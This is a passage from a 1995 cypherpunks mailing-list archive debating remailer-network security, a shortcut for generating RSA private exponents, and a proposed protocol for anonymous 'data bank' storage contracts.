>> Frank she is interested in) she knows only that it was one of the messages
>> from Chaum to David after Chaum got the message from Alice, and before
>> David sent it to Bob.  While Chaum and David can both read the message, it
>> still provides mixing capabilites inside the remailer net itself, and thus,
>> some protection to Frank.  (Who apparently needs the help.)
>
>This is a commonly made suggestion, but philosophically I am opposed.  We
>got into this fix (lack of privacy) by letting people rely on others to
>do things for them.  It's time for people to take responsibility on their
>own.  The kind of thing you are suggesting provides the illusion of
>privacy.  Never trust remailer operators!
>

below:  (Couldn't resist ;-)

The point of "Uncling" insecure messages has nothing to do with improving
the security of the insecure messages.  I agree, as a good member of the
Libertarian-Christian wing of the Republican party (NYET!) that these folks
deserve snakeoil.  But we're _not_ doing it for them.  We're doing it for
Frank, who does everything right.  If Eve doesn't know anything we don't
have to tell her about Alice's messages, then she gains no free negative
information about Frank's.  Judging by the remailer stats, there are a lot
of messages traveling "in the clear." These messages currently do nothing
for those of us that do things right.  It's time that they do.

So I'm not encouraging Alice to trust Chaum.  I'm encouraging Chaum to give
Frank all the help he can.  Frank, who just blew the whistle on the
"Justice" Department.  Frank, who does everything right, and might even
stand out because he does.  Frank, the guy we are all really doing this
for.

To put it another way, if we really don't want centralized solutions, if no
one should trust any of us, if the users should provide all of their own
cover, then why are you running a remailer?  Let them telnet to port 25.
Let them do whatever.

Maybe that was too harsh.  I don't advocate holding people's hands.  What I
_do_ want to do is to provide the best service that we can.  Note that from
earlier and current work (thanks, guys!), we see that even if the remailer
net itself is completely secure, the sender and reciever can still be
traced with near-exponential speed.  

So our systems provide a delay in tracking of a couple of months.  Big
deal.  The TLAs routinely take years to build a serious case.  If we are
going to be any help to folks that _really_ need it, we have to extend the
black box all the way to people outside the net.  As you said, not everyone
will be remailers anytime soon.

So if I am trusting a remailer net, wouldn't it be nice to know that no one
but the ends can even think about compromising the message?  (Until one of
them does.)  Wouldn't it be nice to know if the ends were being shadowed?

--

As for signing intra-net traffic, suppose, at some time in the future, we
agree that we do, in fact, need them.  Will it be easier or harder to
implement then?


>>     A word on remailer keys:  Since pgp uses square-and-multiply for
>> exponentiation, we see that the amount of work needed to sign a message is
>> d(m) * (d(e) + o(e)) where d(m) is the digits of the modulous, d(e) digits
>> of the exponent, and o(e) is the number of ones in e.  (I don't remember
>> the technical term.) Since the public key is small, each of the parts of
>> the private key will be large, BUT, there is no reason to assume that we
>> cannot get lucky, and find an m such that d(e) + o(e) is much smaller than
>> expected, (d(m) * 3/2, roughly) thus greatly reducing the system demand of
>> the remailer.  In fact, it might be possible to move to 768-bit keys for
>> those that have kept their sizes down in the past.  If pgp handles each
>> prime separately, we look for a double-lucky modulous.  (And a source of
>> random numbers that does not involve striking keys!)
>
>Since the secret key d is effectively a random number from 0 to m, you
>would have to create, say, 1000 key pairs to have a good chance of
>finding a d that was as much as 10 bits shorter than m.  Then o(d) might
>be 5 bits shorter.  So you'd be done from 768+384 to 758+379 or about a
>1% reduction in time.  And it will take a while to generate 1000 keys.
>To get a 2% reduction you would have to generate 1000000 keys.  I hope
>you have a lot of time on your hands.
>

Actually, I did make this error when I first considered this, also.  We do
not hope for a short key.  In fact, we know that the key will be long, when
viewed in parts, as I now believe that it is.  We hope that the key will be
0 rich.  The chance of this just comes off of the binomial distribution,
which is not nearly so bad.  Sorry.  And a, say, 10% improvement above
expected allows a cooresponding length increase--which does something
_more_ than improve security by 10% ;)


>I'm sorry to have been so negative, 

Not at all.  We're not talking about anything as important as unix vs
windows.  You must be a better person than I.  I usually love shooting down
lame-brain ideas.  ;-)


>                                   but this message is part of a long
>tradition advocating putting more responsibility into the remailer net.
>I strongly feel that better solutions put power into the users' hands.
>I oppose centralized solutions.
>
>Hal

See below.  I mean above.  I mean below:.  This is not, IMHO, a centralized
solution, as I see it.  As I see it, this is a _minimal_ solution to the
problem that today, our net is laughably easy to crack.  I assume that
anyone that wants to spoof will have a reason to do so.  I assume that if
the NSA/FBI/CIA/DEA/DIA/ATF wants to trace a message, they will bring the
full power of their systems to bear, including reading this list.

Anyone else?  Tim's usually pretty good at panning me. :-P  :-)


Nathan

---
Cypherpunk's precausions today look hopelessly paranoid.  Until you
consider that their precausions from yesterday are now considered
hopelessly quaint.
---

"PGP?"                        "ITAR!"                          "Oh, RKBA!"


                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 29 Jan 95 06:49:56 PST
To: cypherpunks@toad.com
Subject: Always after me lucky primes...
Message-ID: <Pine.3.89.9501290858.A10885-0100000@edwin.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
So Hal thinks that it would take a lot of work to get a private exponent
that is even marginally short?
 
Let n be the random number generated by keystrokes.
Let m be n mod (0x10001 * 8 * 9 * 25 * 49).
Let s be m mod 0x10001.
Let n1 be n + 0x10000 - s.  Let t be m + 0x10000 - s mod 8 * 9 * 25 * 49.
Let t2 be m mod 8, t3 be m mod 9, t5 be m mod 25, t7 be m mod 49.
Let n2 be n1 / 2, n3 be n1 / 3, n4 be n1 / 4, ... n7 be n1/7.
 
using t's, determine if n1 is a mult of 2, 3, 5, 7.
if so, check appropriate element of {n2, n3, n4, n5, n6, n7} for primeness.
(there may not be one).
if not check n1.
EndELSE
 
Loop:
Determine if some element of {n1,...n7} is prime 
If so, let d = (n1 + 1 ) / 0x10001
     [equiv: n1/0x10001 + 1]
  Let k = 0's in d.
     [check previous flamage for best method]
  If k is below threshhold, save and exit.
     (you may wish to ensure that k is _above_ a certain threshhold...)
EndIF
EndIF
 
Let n1 += 0x10001
using t's, determine if n1 is a mult of 2, 3, 5, 7. 
if so, increment the appropriate elements of {n2, ... n7}.
also, check appropriate element of {n2, n3, n4, n5, n6, n7} for primeness.
  (there may not be one).
if not check n1.
EndELSE
 
EndLoop:
 
:-D
Cypherpunks write algorithms, and argue about operating systems.
 
 
Clearly, if you wish to be a stickler about the number of digits that you
end up with, you wouldn't use n2 through n7.  The t's, however, or some
version thereof, would speed the checking noticably.
 
 
Nathan
 
I hearby provide notice of claim to all intelectual copyrights relating to
the above algorithm(s) against all entities using the algorithms for
commercial purposes, specifically against PKP, and Viacrypt, their
assignees, and anyone claiming the devolution of their patents. For non-
commerical use, including inclusion into PGP (tm) packages that will be
distributed free of charge, Fred Fish and similiar distributions, I release
all claims, providing a copy of this notice is included.
 
 
"PGP?"                        "ITAR!"                          "Oh, RKBA!"
 
 
                   |--------------------------------------------------+
  ----------------- 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com> )
 |44B3D866 3D551E2E ---------------------------------------------------
 |F89222A6 338CDE24/ |
  -----------------
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyu1SHmgMs8UcStNAQGXjQgAmr0PN2RbLwM4IN15YdQhwD/IvYFylTCS
naRCyvqjgzdsPROZAhZKP5eoVbMn6xWmwRhxfplGTCKf3YMRu9FSQHEc7ekL7QQw
mxRvGC2WOMkMuIRXt0DKu6keof9XwWUL2voni+eKme50sppf0ETmLu1outjcCyR6
bJD0XyUxbBPUKpP4prQSc/kT7XVt+wGJVRZtkN1F+43roLRLZYzzjItuR4gqUQ8D
WpC8CDfQTCLb0GDKNC+ZirNdSKGg2t3XnHC2gQpXRLRykPlYG9SpBDm+VuIXV0vl
dALZLV9UtNyulmOYqqkCqBmAavDQDuTjbRnELLsELLSSZrOIiKQ+Sw==
=CaQ6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Sun, 29 Jan 95 09:10:23 PST
To: cypherpunks@toad.com
Subject: Data Bank
In-Reply-To: <ab5087cb03021004c425@DialupEudora>
Message-ID: <199501291709.JAA29626@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: norm@netcom.com (Norman Hardy)

   The hat check specifies the secure hash of the data, the
   penalty to be paid upon failure to produce the data, and the cost of
   redeeming the data. 

This sentence contains the single best idea in the whole proposal,
which is to specify liquidated damages in the retrieval note.  (Most
of you will be saying, What?)

One of the largest costs of any conflict resolution is deciding, once
the existence of damage has been agreed upon, exactly what the scope
and worth of that damage was.  "Liquidated damages" are a term of art
referring to a pre-agreed upon worth of the damage in question.  One
most often sees them in construction contracts, where the contractor
will agree to pay a fixed amount per day for each day late.  Rather
than bickering over how much a delay is worth, the two parties agree
in advance to value each day of delay at a given amount.  This kind of
agreement is cheaper _for both parties_ than going to court.

In the data bank case, the liquidated damages are the amount to be
paid upon failure to produce data.  In this case, there's no need even
to call it a penalty.  The data bank agrees to produce either data or
a fixed amount of money.  They get to choose, and it will almost
always be cheaper to remit data rather than money.

   The hat check is signed blindly by the bank and is a
   bearer instrument. 

There's no need to have it signed blind.  A blind signature is useful
when two parties have some persistent relationship with the
intermediary; when they don't have identity, there's no need for
blinding.  Take, for example, a money bank.  Two account holders who
wish to transact also wish to keep that transaction secret; in order
to do so, they use a blind-signed note, which prevents the linkage
from being determined by the bank.  The reason that the blind
signature is necessary is that the two parties have accounts with the
bank, that is, they are known to it in advance.  These two wish not to
create more information at the bank, that is, more information than is
already known.

On the other hand, this model of a data bank does not have account
holders.  The relationship between this data bank and its customers is
embodied in the retrieval notes ("hat checks").  Furthermore, if two
parties wish to move data through the data bank, the storage and the
retrieval transactions can be trivially linked because they are about
the _same_ piece of data.  The hash of the stored data is the same as
the hash of the retrieved data.  Because data is not fungible -- one
block of data is not like another -- the parties who use this data
bank as a intermediary of transmission must remain anonymous to the
data bank if they are to remain unlinked.

A blind signature will not alleviate the need to remain anonymous to
this data bank.  Suppose (somehow) the data bank was able to sign
blind the right sort of retrieval note.  So fine, the retrieval note
doesn't reveal the linkage directly.  But the retrieval note must
contain the hash of the data being retrieved.  The hash can't change;
it's the access key.  So the unchanging part of the note is what gives
the link away.  We therefore conclude that there's no need for a blind
signature here at all.

   Cancel a hat check: A holder of a hat check may sell it back to the bank at
   a negotiated price thus releasing the bank from the threat of paying a
   penalty in the future.

This cancellation can't be done well.  Remember that the parties are
remaining anonymous to the data bank.  In order to release the data
bank of an obligation, some party would have to make some signed
statement releasing the data bank from the obligation.  But making a
signature reveals identity, perforce.

Furthermore the retrieval note is a bearer instrument, but it's a
_digital_ bearer instrument, which means you can't simply give the
note back to the data bank.  There's no piece of paper to return.
Once the note is out there, it's out there forever.  There can be lots
and lots of bearers.  Which one of them gets to release the data bank
of its obligation?

   The hat check may specify expiration dates, cancellation terms etc. 

The retrieval note very well should specify an expiration date, since
otherwise the data bank has specified an obligation in perpetuity.  A
perpetual obligation is much less stable than a fixed-time one.  The
value to the data bank of disappearance grows larger as the cost of
storing the data increases.  No new external revenue is coming in (by
definition -- otherwise you've got a renewable agreement, which is
different) and all you've got is costs.  So there becomes little
reason not to simply abscond with the assets and deny any outstanding
obligations.

A customer, therefore, would be wise not to deal with a data bank
which signed perpetual obligations.  If a customer wants indefinitely
long storage, the best way to do this is with a set of interlocking
obligations with mutually ignorant parties.

   The bank is explicitly permitted to disseminate the data and may
   well do so to lay-off risks. In this sense a data bank is like in
   insurance company that spreads and shares risks. A hat check may be
   viewed as a life insurance policy for the data.

This is exactly why liquidated damages are such a good idea.  By
making explicit the cost of data loss, a data bank can much more
accurately calculate it's risks and costs.  Indeed, the ability to lay
off risk of loss is what can create a stable economy of data storage.

There are lots of extraneous elements in the proposal that I've not
addressed.  I wish to highlight what is valuable and not to dwell on
what is not.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 29 Jan 95 09:15:38 PST
To: cypherpunks@toad.com
Subject: Re: Protocols for a Data Bank
Message-ID: <ab517999010210042be5@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


This is a corrected version. I was wrong to suggest that the protocol was
similar to blinded signatures.


Protocols for a Data Bank

The purpose of a data bank is to store large bodies of information for long
periods of time. I suggest here some protocols and contracts for a data
bank and its customers. We then discuss risks, incentives and
stratification of the data storage industry.

Here are several transactions that a data bank engages in.

Acquire data: A client anonymously sends a collection of data along with
funds sufficient to warrant the bank's computing its secure hash and
holding the data for a few days. The bank knows the data only by its secure
hash.

Selling (Hat) Checks: The bank will sell a check to anyone who will pay a
negotiated price. The check specifies the secure hash of the data, the cost
of redeeming the data, and the penalty to be paid by the bank upon failure
to produce the data. A client proposes the details of a check as
follows: Send (SH(acquisition), redemption price, penalty, SH(Secret)) to
the bank along with a proposed price. 'Secret' is a secret random number
chosen by the client for this negotiation. If the bank agrees it signs and
trades the signed message for the proposed price, or it may propose another
price. The signed message is the check and is a bearer instrument.

Redeem data: Any holder of a check can present the check along with the
secret, the redemption fee and demand the data. The data bank must then
either produce the data or pay the penalty to the holder of the check. A
particular check is canceled whenever the bank pays the penalty like a
spent Chaum DigiCash note. The bank can sell multiple checks for the same
data. Different checks for the same data may specify different penalties.

Sell a copy of an acquisition: Any one can request a piece of data
identified only by its secure hash. The bank is free to sell a copy of the
data to anyone with the secure hash. The bank sets the price.

Publish index: The bank can publish its list of hashes. (This makes data
hunters possible.)

Cancel a check: A holder of a check may sell it back to the bank at a
negotiated price thus releasing the bank from the risk of paying a penalty
in the future. This also allows the bank to retrieve the physical storage
where the data is stored if it is sure that it has not sold other checks
for the data.

Checks may specify expiration dates, cancellation terms etc. The bank is
explicitly permitted to disseminate the data and may well do so to lay-off
and reduce risks. In this sense a data bank is like an insurance company
that spreads and shares risks. A check may be viewed as a life insurance
policy for the data.

Risks

Trust may be divided by agreeing on a notary. Upon redemption the bank
examines the check to see if it has been canceled. If it knows the Secret
which produced the SH(Secret) of the check, the check is canceled.
Otherwise a mutually trusted notary takes the check, accepts the redemption
payment specified therein from the client, passes over the data on its way
from the bank to the client while computing the secure hash. If the secure
hash matches that in the check the notary delivers the payment to the bank.
If the hash fails to match, the transaction is aborted and a penalty
transaction begins. The bank delivers the penalty to the notary and the
client delivers the secret to the notary. If the hash of the secret matches
that in the check then the notary delivers the secret to the bank
(canceling the check) and the penalty amount to the client. The notary need
not have long term financial stability as must the bank.

Brokers may have an interface similar to a bank. They return baskets of
checks. This reduces the risk to the client that one of the data banks will
fail financially and be unable to pay the penalty. The broker need not be
financially stable.

Data Hunters engage in knowing who has what data. Given a hash they can
tell you what banks have the data. This might be the ultimate URL or URI
server.

Inflation can damage incentives. Checks might be denominated in gold or
currency baskets or what ever.

RSA modulus size is critical for long term contacts. 2K bits of modulus or
more may be warranted.

Example

I can imagine the Getty Museum digitizing its Rembrandts and storing the
results in a data bank. The data might be insured for $10,000,000. The bank
would disseminate the data to increase security and lower its risk. The
museum would probably encrypt the data and share the key and hash ala
Shamir for safe keeping. The museum would not share the check because it
wants to be the one paid upon default.

Incentives

A data bank, or any other player, may find that keeping data profitable
beyond the point of any outstanding checks. It can make money by selling
copies of the data. Data banks thus have an incentive to disseminate their
list of holdings in the form of hashes, to support data hunters.

Design Considerations

It may seem strange that the data bank does is willing to sell data to who
ever will pay. I suggest this because it is easy to encipher the data and
not have to trust the bank. You can distribute the key thru what ever
channels you transmit the secure hash of the data.

Note that bank clients are always anonymous. Data is never held for some
known person. Data may be held solely for speculation. The purpose of the
penalty is to motivate the bank to keep data for which there is no reason
to forecast sales revenue. Unlike Chaum bank notes, the issuance of a hat
check may be  associated with the redemption. The depositing of data and
hat check issuance, however, may be anonymous. Data redemption may be
anonymous but collecting a substantial penalty may be difficult to arrange
anonymously. Managing anonymous transactions is a difficult but orthogonal
issue.

The Bank's State

Logically the bank can perform all of these transactions by merely keeping
the unordered set of acquisitions. It is practically necessary to index
these by their secure hash but this can be rebuilt from the acquisitions
themselves. When it looses data it must keep canceled checks to avoid extra
penalties. The bank need not keep records of checks that it has sold unless
it wants to know when it can delete acquisitions. It may want to keep
marketing information to know when acquisitions are worth keeping merely to
sell copies of. The bank will need to keep records of the checks that it
issues for financial auditors (to satisfy owners of the bank.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 29 Jan 95 10:22:04 PST
To: cypherpunks@toad.com
Subject: Re: Data Bank
Message-ID: <ab51855603021004ede6@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


My second posting crossed in the mail with Eric's notes.

At 9:09 AM 1/29/95, Eric Hughes wrote:
>   From: norm@netcom.com (Norman Hardy)
....
>
>   The hat check is signed blindly by the bank and is a
>   bearer instrument.
>
>There's no need to have it signed blind.  A blind signature is useful
>when two parties have some persistent relationship with the
>intermediary; when they don't have identity, there's no need for
>blinding.
....
> We therefore conclude that there's no need for a blind
>signature here at all.

Yes, I was confused.  jpp@markv.com had yet other valid objections.
....
>   Cancel a hat check: A holder of a hat check may sell it back to the bank at
>   a negotiated price thus releasing the bank from the threat of paying a
>   penalty in the future.
>
>This cancellation can't be done well.  Remember that the parties are
>remaining anonymous to the data bank.  In order to release the data
>bank of an obligation, some party would have to make some signed
>statement releasing the data bank from the obligation.  But making a
>signature reveals identity, perforce.

I have a novel sense of cancelation in mind. The check is canceled by the
mere fact that the bank knows the Secret that produced the SH(Secret) in
the check. The bank need not acquire or maintain a signed check revocation.
This is sort of like Chaum's spent bills. This requires the client to trust
the bank during the penalty transaction or to require escrow service. I
have modified the original to describe this better.

>
>Furthermore the retrieval note is a bearer instrument, but it's a
>_digital_ bearer instrument, which means you can't simply give the
>note back to the data bank.  There's no piece of paper to return.
>Once the note is out there, it's out there forever.  There can be lots
>and lots of bearers.  Which one of them gets to release the data bank
>of its obligation?
....
Any bearer. Just as any bearer of a Chaum bill can spend it. Only he who
spends it first, can spend it. Disseminate your hat checks carefully. That
is another reason that Getty, in the example, holds the hat check
carefully.
....
>   The hat check may specify expiration dates, cancellation terms etc.
>
>The retrieval note very well should specify an expiration date, since
>otherwise the data bank has specified an obligation in perpetuity.  A
>perpetual obligation is much less stable than a fixed-time one.  The
>value to the data bank of disappearance grows larger as the cost of
>storing the data increases.  No new external revenue is coming in (by
>definition -- otherwise you've got a renewable agreement, which is
>different) and all you've got is costs.  So there becomes little
>reason not to simply abscond with the assets and deny any outstanding
>obligations.
>
>A customer, therefore, would be wise not to deal with a data bank
>which signed perpetual obligations.  If a customer wants indefinitely
>long storage, the best way to do this is with a set of interlocking
>obligations with mutually ignorant parties.
....
Good points. I anticipate more complex broker services here.

I like the idea of a penalty for delay in retrieving the data aside from
penalty for loosing the data. This may be strategic in the bank's arranging
for the storage and retrieval from other sites and banks.

Thanks. I will try to produce an emmended version thru ftp soon.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: random walk <pfinerty@seattleu.edu>
Date: Sun, 29 Jan 95 12:47:48 PST
To: Todd Masco <cactus@hks.net>
Subject: Re: NNTP archives and internet credit bureau...
In-Reply-To: <199501290425.XAA25516@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950129124315.17273B-100000@bach.seattleu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

i was able to get to hks.lists.cypherpunks group quite easily using NCSA 
Mosaic.  i set my news server to nntp.hks.net and then told Mosaic to go 
to a URL with this format, 

news:hks.lists.cypherpunks  

surprisingly, this worked quite well.

- -------------

on another note, i recently checked out the internet credit bureau as 
well and will write about that soon.  very interesting and a little scary 
too.

- -pjf


after removing the brain i simply placed it in a jar on my bench and
connected it to my calculator. it didn't do anything but it looked cool.
pfinerty@bach.seattleu.edu
finerty@msscc.med.utah.edu           finger any acct. for pgp key
pfinerty@nyx10.cs.du.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBLyv/BbJv5rDIkn05AQF2bgIAlgtdThjO4Zex67YBw9Ho1lF7t+w7ZCMe
PCufhFzfUpdjbz6/HGvC9RClpqmfkssNw0a++MwszIIBpCT2eAnM/w==
=wry5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Sun, 29 Jan 95 13:09:22 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: CERN Web Proxy
Message-ID: <Chameleon.4.01.950129130912.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Could someone post the host/port number of the proxy server at CERN?

Thanks,

Johnathan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 29 Jan 95 13:14:56 PST
To: cypherpunks@toad.com
Subject: Re: Secure (?) Remailer-net
Message-ID: <199501292113.NAA06033@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Nathan Zook <nzook@bga.com>
> >>     First, the message is signed with the sender's key.  (More on that
> >> later.)
> >
> >I did not see why this should be done.
> >
> 
> No?  Isn't the InterNet currently under a serious packet-spoofing attack?
> Don't we expect Eve to be AKA NSA?  If I run a remailer, I want to know
> that I'm not being lied to in the process.  That insistance might just save
> the legal butt of the guy being spoofed, by demonstrating that the packet
> did not in fact originate from the remailer.  Just because remailers are
> legal doesn't mean that the govt won't still try to shut them down...

I can see the advantage from the sender's point of view.  If I sign all
messages I send, then I have some defense against the charge that I sent a
particular message, if it doesn't bear my signature.  (OTOH the
prosecutors can argue that I simply skipped signing that one.)  This does of
course expose me to the risk that if I _did_ send a particular message,
my signature will be incriminating.  In any case I am still puzzled by
your statement that you as a remailer operator would want to be able to
verify the source of all incoming messages.  Would you do things
differently with messages from different sources?  I hear you saying
that you care if you get a message claiming to be from Alice but not
bearing a good signature from her.  Why?  Again, what would you do
differently?

> >A better approach IMO is to embed the message length in the encrypted
> >information (as PGP does) and pad with cryptographic random garbage
> >(which PGP could be patched to do).
> >
> 
> In this instance garbage is defined as cryptographic random.  If the
> message has a length indicator in the clear, then Eve can read it.
> (Remember, Eve runs snakoil@nsa.gov.)  Therefore, such a marker has to be
> _inside_ the wrapper.  Given this, (that everything is PGP wrapped) there
> is always the chance that PGP will compress a message, even one with
> cryptographically strong bits in the end.  While compression can improve
> protection, it is not likely to do so if the original message was already
> PGPed.  Only "clear" messages, therefore, risk losing protection.  As you
> note, such messages don't deserve as much help as opaque ones.

PGP already includes a cryptographically protected length field in the
message.  It will ignore any data past that, according to my experiments.
All that is needed is a simple patch to add junk data to the end.

> >>     Note that this system would allow the extropian remailer to be
> >> compatible with Matt Ghio's alias system.  (Right now, the remailer doesn't
> >> like separate pgp packets, or packets it can't read, or something.) Under
> >> the current system, the precausion is entirely warranted.
> >
> >I don't think so.  The problem with Miron's extropy remailer is that it
> >only passes through the contents of a PGP block.  For anonymous addresses
> >to work, the (chained,encrypted) address must be in a PGP block which
> >precedes the message body.  I don't see how any cutmarks idea would
> >affect this.
> >
> 
> Sure it does.  If the whole thing is inside a PGP wrapper, then it is
> secure.  "Only passing through the contents of a PGP block" is currently a
> security measure that makes good sense.  But if you have two separate
> blocks _inside_ an outer wrapper, you already have full security.  Strip
> off the outside, find two more wrappers.  Strip the first, get remailing
> instructions.  Attempt to strip the second.  Fail.  Attach second wrapper
> to forwarded message.  Full security.

I still don't quite follow this.  Exactly what attack would be possible
against Miron's remailer if it allowed encrypted reply blocks (as all
others do) which would fail if the messages were wrapped as you suggest?

> Alice signs her messages to the remailer because she doesn't want anyone
> spoofing her use of the remailer.  If a message goes in at 00:00:00.01, 1
> Jan, 2001 that is "From:" her, it is FROM her.  More of the same reasoning.
> This key doesn't have to have anything to do with the key she uses with
> Bob.  It is the one that she wants the general public to use for HER.

Alice may not have a key whe wants the general public to use - she may
just be using one for her private correspondents.  Actually it seems to
me given the nature of remailing that it would be superior if it were
easy for people to "spoof" my use of the remailer.  That would give me
more credence to claim innocence.  The more useless return addresses are,
the less we even need remailers.

> Suppose you were using the remailer net.  Would you care to know that
> someone was spoofing a node?  I would.  It would indicate that someone is
> either hacking the system (probably no big deal), or that someone might be
> shadowing a remailer.  That is, the remailer is no longer secure.  Spoofing
> is a big deal on the net generally, and if we start being used a lot, we
> will have to deal with it as well.  Why not now?

It's not my job to fix the damn Internet.  So what if I get mail claiming
to be from abc when it's actually from def?  I of all people care the
least, specifically because I throw away this data.  Virtually everyone
else on the net cares where their mail comes from, but I don't.  My whole
purpose is to discard the information about where it comes from.  That is
why I am so confused about your emphasis on checking signatures.

> Maybe that was too harsh.  I don't advocate holding people's hands.  What I
> _do_ want to do is to provide the best service that we can.  Note that from
> earlier and current work (thanks, guys!), we see that even if the remailer
> net itself is completely secure, the sender and reciever can still be
> traced with near-exponential speed.  

Although I agree with Wei Dai's mathematics, to my mind it points up the
importance of successful countermeasures rather than implying that the
remailer network is inherently insecure.  For example, if you send one
identical message every batch, Wei's math shows clearly that you can't be
traced.  Let's not get rumors started about how the remailers don't
work.

> So our systems provide a delay in tracking of a couple of months.  Big
> deal.  The TLAs routinely take years to build a serious case.  If we are
> going to be any help to folks that _really_ need it, we have to extend the
> black box all the way to people outside the net.  As you said, not everyone
> will be remailers anytime soon.

Do you see your suggestion as protecting against Wei's in/out correlation
attack?  I don't see it.  If fixed-sized packets are used, with chained
encryption, I think you have as good a system as you do with all of your
inter-node encryption and signing.

Suppose one good encrypted message enters the net with 10 unencrypted
ones.  Won't the full path of each of the 10 be visible to an outsider?
Even if the remailer helps out those 10 doltish users by encrypting them
from there on out, the outsider already saw their whole paths!  They will
know how many unencrypted messages are going out to each destination, and
from that determine where the encrypted message is going.

> >Since the secret key d is effectively a random number from 0 to m, you
> >would have to create, say, 1000 key pairs to have a good chance of
> >finding a d that was as much as 10 bits shorter than m.  Then o(d) might
> >be 5 bits shorter.  So you'd be done from 768+384 to 758+379 or about a
> >1% reduction in time.  And it will take a while to generate 1000 keys.
> >To get a 2% reduction you would have to generate 1000000 keys.  I hope
> >you have a lot of time on your hands.
> >
> 
> Actually, I did make this error when I first considered this, also.  We do
> not hope for a short key.  In fact, we know that the key will be long, when
> viewed in parts, as I now believe that it is.  We hope that the key will be
> 0 rich.  The chance of this just comes off of the binomial distribution,
> which is not nearly so bad.  Sorry.  And a, say, 10% improvement above
> expected allows a cooresponding length increase--which does something
> _more_ than improve security by 10% ;)

Yes, I see that you are right about this.  It would be easy to generate
e,d pairs and get a d which is significantly short on 1's by 10% or more.
I did not quite follow your algorithm to do this (was n the modulus or
was it phi, the sum of the modulus' divisors?).  The one caveat is that
if "high-zero" decryption exponents are widely used, it could conceivably
reduce the search space somehow, although I don't see offhand how to
exploit this.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Sun, 29 Jan 95 13:04:12 PST
To: cypherpunks@toad.com
Subject: Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9501291512.A11570-0100000@ivy.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Lance Cottrell <lcottrell@popmail.ucsd.edu>

>I agree completely that messages should be encrypted between remailers.
>This does raise the issue of keeping a database of all other remailers at
>each remailer. Lets settle for encrypting to the next remailer most of the
>time.

Well, actually, I'm suggesting a database that includes all remailers and
all selected users.  ICT: in order to beat TA, first or last remailers are
going to _have_ to used standaradized, encrypted packets.  The remailers
are almost secondary here, except that we aren't sure that TA through the
net is impossible.  Or we could be facists, and _only_ send out PGP-ed,
standard sized packets.  (Forcing remailer-users to get into PGP.)
Something would have to be done about lists & mail-to-news.

Is there some difficulty in maintaining a database?  Remailers would want
to publicize their exsistance.  This might involve pinging, but so what?
That's just more noise.

>The best way to do that is to open a socket between the remailers, and use
>DH key exchange (authenticated with RSA?), to generate the encryption key.
>This gives forward security to any intercepted messages. It is high on my
>list of upgrades to Mixmaster.

But doesn't this require a realtime connection to be practical?  ie:
remailers must be _on_ the net?

As far as this all goes, the sender could stick _all_ packets together, PGP
the whole thing, and send _that_.  This would only require signing once per
recipient per tick.  T1, anyone?

***

P.S.  Could you mail me that essay?  I'm long distance to the net right now.

***

Adam Shostack <adam@bwh.harvard.edu>

>Nathan Zook:
>|  
>|     Suppose Alice sends Bob a message e(M) through Chaum.  Eve, a stong
>| opponent, wants to trace the message.  She keeps track of all outgoing mail
>| from Alice, an MD5 hash of all incoming messages to Bob, and outgoing from
>| Bob.  Eve then sends Chaum e(M), and waits for a matching MD5 to Bob that
>| doesn't correlate to an outgoing MD5 from Bob.  (Eve knows that Bob is a
>| remailer.)
>|  
>|     Gentlemen, I believe that I have just stumbled upon a strong proof of
>| the necessity of remailer auto-encryption of all messages.  Since the
>| session key is PRG, MD5 will change (a lot;).  Furthermore, remailer auto-
>| encryption allows the mailers to number their messages to each other.  A
>| low number means a re-transmit from the remailer, which is not possible,
>| unless some sort of ACK system is in place, and even then, would still
>| flag.  Of course, if the remailers _sign_ their messages (on the way out)
>| as well, you could compare the timestamps of the signatures with the
>| message itself.
>
>	This is strong argument for encrypting your chain of messages,
>using premail, or chainmail, or something similar.  Why the remailers
>should do this is not clear at all from your argument.  Remailer
>operator should be discouraged from cooperation beyond that which is
>needed.
>
>Adam

I think that you are missing the attack.  Eve wants to prove that Alice
sent a message to Bob.  By resending Alice's message, it will route through
Chaum just fine, producing identical output (message to Bob) as before.
Assuming that Eve doesn't intercept the message, stopping Bob from getting
it, Bob will know that something is up when he gets the message the second
time, but by then it is too late.  Eve knows that Alice's message, sent at
time X, corresponds to a message received by Bob at time Y.  This is
exactly the sort of thing that LEAs love to use in building a case.

My claim is that the only way to prevent this attack is for Chaum not to
send out identical messages if he receives identical messages.  Identical,
in this case, would include messages identical except for
"cryptographically strong random" data tacked on to the end, because if Eve
